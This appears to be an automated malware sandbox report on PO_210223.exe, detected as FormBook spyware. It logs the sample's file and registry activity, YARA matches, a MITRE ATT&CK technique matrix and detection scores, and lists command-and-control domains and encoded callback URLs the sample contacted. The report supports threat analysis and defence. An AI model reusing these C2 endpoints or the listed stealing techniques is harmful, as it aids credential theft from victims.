Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery331	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Masquerading1	Input Capture1	Virtualization/Sandbox Evasion4	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion4	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	System Information Discovery112	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing22	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO_210223.exe	31%	Virustotal		Browse
PO_210223.exe	43%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
PO_210223.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\kwqifureL.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\kwqifureL.exe	43%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.PO_210223.exe.890000.0.unpack	100%	Avira	HEUR/AGEN.1134873		Download File
9.2.PO_210223.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
kaieteurny.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cnal	0%	Avira URL Cloud	safe
http://www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf	0%	Avira URL Cloud	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/pics/12471/arrow.png)	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/pics/12471/libgh.png)	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/logo.png)	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.carterandcone.comig	0%	Avira URL Cloud	safe
http://www.246835.com/ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb	0%	Avira URL Cloud	safe
http://www.carterandcone.comva9y	0%	Avira URL Cloud	safe
http://www.carterandcone.comcy	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot	0%	Avira URL Cloud	safe
http://www.fonts.comc	0%	URL Reputation	safe
http://www.fonts.comc	0%	URL Reputation	safe
http://www.fonts.comc	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)	0%	Avira URL Cloud	safe
http://www.tiro.comlic	0%	URL Reputation	safe
http://www.tiro.comlic	0%	URL Reputation	safe
http://www.tiro.comlic	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf	0%	Avira URL Cloud	safe
http://www.kaieteurny.com/ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb	0%	Avira URL Cloud	safe
www.000666dy.com/ntg/	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf	0%	Avira URL Cloud	safe
http://www.carterandcone.comk	0%	URL Reputation	safe
http://www.carterandcone.comk	0%	URL Reputation	safe
http://www.carterandcone.comk	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.zhongyicts.com.cniy	0%	Avira URL Cloud	safe
http://www.carterandcone.comint	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://i3.cdn-image.com/__media__/pics/12471/libg.png)	0%	Avira URL Cloud	safe
http://www.tiro.comal	0%	Avira URL Cloud	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwW	0%	Avira URL Cloud	safe
http://www.tiro.com8i	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kaieteurny.com	23.229.197.103	true	true	0%, Virustotal, Browse	unknown
sll.nnu.pw	103.66.59.142	true	true		unknown
www.pophazard.com	204.11.56.48	true	true		unknown
www.246835.com	unknown	unknown	true		unknown
www.kaieteurny.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb	true	Avira URL Cloud: safe	unknown
http://www.246835.com/ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb	true	Avira URL Cloud: safe	unknown
http://www.kaieteurny.com/ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb	true	Avira URL Cloud: safe	unknown
www.000666dy.com/ntg/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnal	PO_210223.exe, 00000000.00000003.647755183.0000000008255000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com	PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
